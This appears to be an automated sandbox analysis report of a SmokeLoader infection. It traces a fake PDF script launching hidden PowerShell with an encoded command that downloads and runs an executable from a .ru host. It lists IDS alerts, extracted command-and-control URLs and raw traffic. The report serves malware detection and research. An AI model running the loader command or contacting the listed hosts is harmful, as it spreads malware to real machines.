JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2832, ParentProcessName: cmd.exe, ProcessCommandLine: powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=, ProcessId: 7248, ProcessName: powershell.exe
      Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\wbfgshs, CommandLine: C:\Users\user\AppData\Roaming\wbfgshs, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\wbfgshs, NewProcessName: C:\Users\user\AppData\Roaming\wbfgshs, OriginalFileName: C:\Users\user\AppData\Roaming\wbfgshs, ParentCommandLine: , ParentImage: , ParentProcessId: 1040, ProcessCommandLine: C:\Users\user\AppData\Roaming\wbfgshs, ProcessId: 6024, ProcessName: wbfgshs
      Source: Process startedAuthor: frack113: Data: Command: powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=, CommandLine: powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=, CommandLine|base64offset|contains: D, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2832, ParentProcessName: cmd.exe, ProcessCommandLine: powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=, ProcessId: 7248, ProcessName: powershell.exe
      Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=, CommandLine: "C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\3312.PDF.wsf", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 8084, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=, ProcessId: 2832, ProcessName: cmd.exe
      Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\3312.PDF.wsf", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\3312.PDF.wsf", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3968, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\3312.PDF.wsf", ProcessId: 8084, ProcessName: wscript.exe
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=, CommandLine: powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=, CommandLine|base64offset|contains: D, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2832, ParentProcessName: cmd.exe, ProcessCommandLine: powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=, ProcessId: 7248, ProcessName: powershell.exe
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-10-04T15:11:00.938931+020020391031A Network Trojan was detected192.168.2.1049710193.46.217.7880TCP
      2024-10-04T15:11:02.326832+020020391031A Network Trojan was detected192.168.2.1049711188.40.141.21180TCP
      2024-10-04T15:11:02.573845+020020391031A Network Trojan was detected192.168.2.1049711188.40.141.21180TCP
      2024-10-04T15:11:28.362203+020020391031A Network Trojan was detected192.168.2.1049713193.46.217.7880TCP
      2024-10-04T15:11:28.563608+020020391031A Network Trojan was detected192.168.2.1049711188.40.141.21180TCP
      2024-10-04T15:11:28.823919+020020391031A Network Trojan was detected192.168.2.1049711188.40.141.21180TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-10-04T15:10:28.037533+020020197142Potentially Bad Traffic192.168.2.1049703193.46.217.7880TCP

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: C:\Users\user\AppData\Roaming\wbfgshsAvira: detection malicious, Label: HEUR/AGEN.1312567
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeAvira: detection malicious, Label: HEUR/AGEN.1312567
      Source: 00000005.00000002.1658821304.00000000006B0000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://unicexpertmagazine.pw/index.php", "http://ceoconstractionstore.pl/index.php", "http://openclehardware.ru/index.php", "http://informcoopirationunicolceo.ru/index.php"]}
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeReversingLabs: Detection: 81%
      Source: C:\Users\user\AppData\Roaming\wbfgshsReversingLabs: Detection: 81%
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
      Source: C:\Users\user\AppData\Roaming\wbfgshsJoe Sandbox ML: detected
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeJoe Sandbox ML: detected
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

      Software Vulnerabilities

      barindex
      Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

      Networking

      barindex
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.10:49710 -> 193.46.217.78:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.10:49711 -> 188.40.141.211:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.10:49713 -> 193.46.217.78:80
      Source: Malware configuration extractorURLs: http://unicexpertmagazine.pw/index.php
      Source: Malware configuration extractorURLs: http://ceoconstractionstore.pl/index.php
      Source: Malware configuration extractorURLs: http://openclehardware.ru/index.php
      Source: Malware configuration extractorURLs: http://informcoopirationunicolceo.ru/index.php
      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0Date: Fri, 04 Oct 2024 13:10:27 GMTContent-Type: application/x-msdos-programContent-Length: 222720Connection: closeLast-Modified: Wed, 02 Oct 2024 05:06:08 GMTETag: "36600-62377654eb000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 06 d2 fc 49 42 b3 92 1a 42 b3 92 1a 42 b3 92 1a 5c e1 16 1a 5e b3 92 1a 5c e1 07 1a 51 b3 92 1a 5c e1 11 1a 1e b3 92 1a 65 75 e9 1a 45 b3 92 1a 42 b3 93 1a 32 b3 92 1a 5c e1 18 1a 43 b3 92 1a 5c e1 06 1a 43 b3 92 1a 5c e1 03 1a 43 b3 92 1a 52 69 63 68 42 b3 92 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 1e 60 49 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 80 01 00 00 64 11 00 00 00 00 00 16 17 00 00 00 10 00 00 00 90 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 00 13 00 00 04 00 00 03 a2 03 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 44 a7 01 00 50 00 00 00 00 50 11 00 e0 a1 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 a4 01 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 01 00 84 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 df 7e 01 00 00 10 00 00 00 80 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 22 20 00 00 00 90 01 00 00 22 00 00 00 84 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 f8 7f 0f 00 00 c0 01 00 00 18 00 00 00 a6 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 1d 05 00 00 00 40 11 00 00 06 00 00 00 be 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e0 a1 01 00 00 50 11 00 00 a2 01 00 00 c4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
      Source: global trafficHTTP traffic detected: GET /download/svc.exe HTTP/1.1Host: bestmagazineforanimalsunicum.ruConnection: Keep-Alive
      Source: Joe Sandbox ViewIP Address: 188.40.141.211 188.40.141.211
      Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
      Source: Joe Sandbox ViewASN Name: CUBENODEES CUBENODEES
      Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.10:49703 -> 193.46.217.78:80
      Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dneagbdmtkktop.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 124Host: unicexpertmagazine.pw
      Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gspupvuevfny.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 145Host: ceoconstractionstore.pl
      Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nqgjgifqepqt.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 368Host: ceoconstractionstore.pl
      Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://biegpmdfbwuaocv.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 226Host: unicexpertmagazine.pw
      Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xcltdjfoaardilo.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 362Host: ceoconstractionstore.pl
      Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ebsdyhoseklppw.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 366Host: ceoconstractionstore.pl
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /download/svc.exe HTTP/1.1Host: bestmagazineforanimalsunicum.ruConnection: Keep-Alive
      Source: global trafficDNS traffic detected: DNS query: bestmagazineforanimalsunicum.ru
      Source: global trafficDNS traffic detected: DNS query: unicexpertmagazine.pw
      Source: global trafficDNS traffic detected: DNS query: ceoconstractionstore.pl
      Source: unknownHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dneagbdmtkktop.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 124Host: unicexpertmagazine.pw
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 04 Oct 2024 13:11:00 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 61 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 75 6e 69 63 65 78 70 65 72 74 6d 61 67 61 7a 69 6e 65 2e 70 77 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 1a2<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at unicexpertmagazine.pw Port 80</address></body></html>0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Content-Length: 7Content-Type: application/octet-streamDate: Fri, 04 Oct 2024 13:11:02 GMTData Raw: 03 00 00 00 7d 4f d6 Data Ascii: }O
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Content-Length: 0Content-Type: application/octet-streamDate: Fri, 04 Oct 2024 13:11:02 GMT
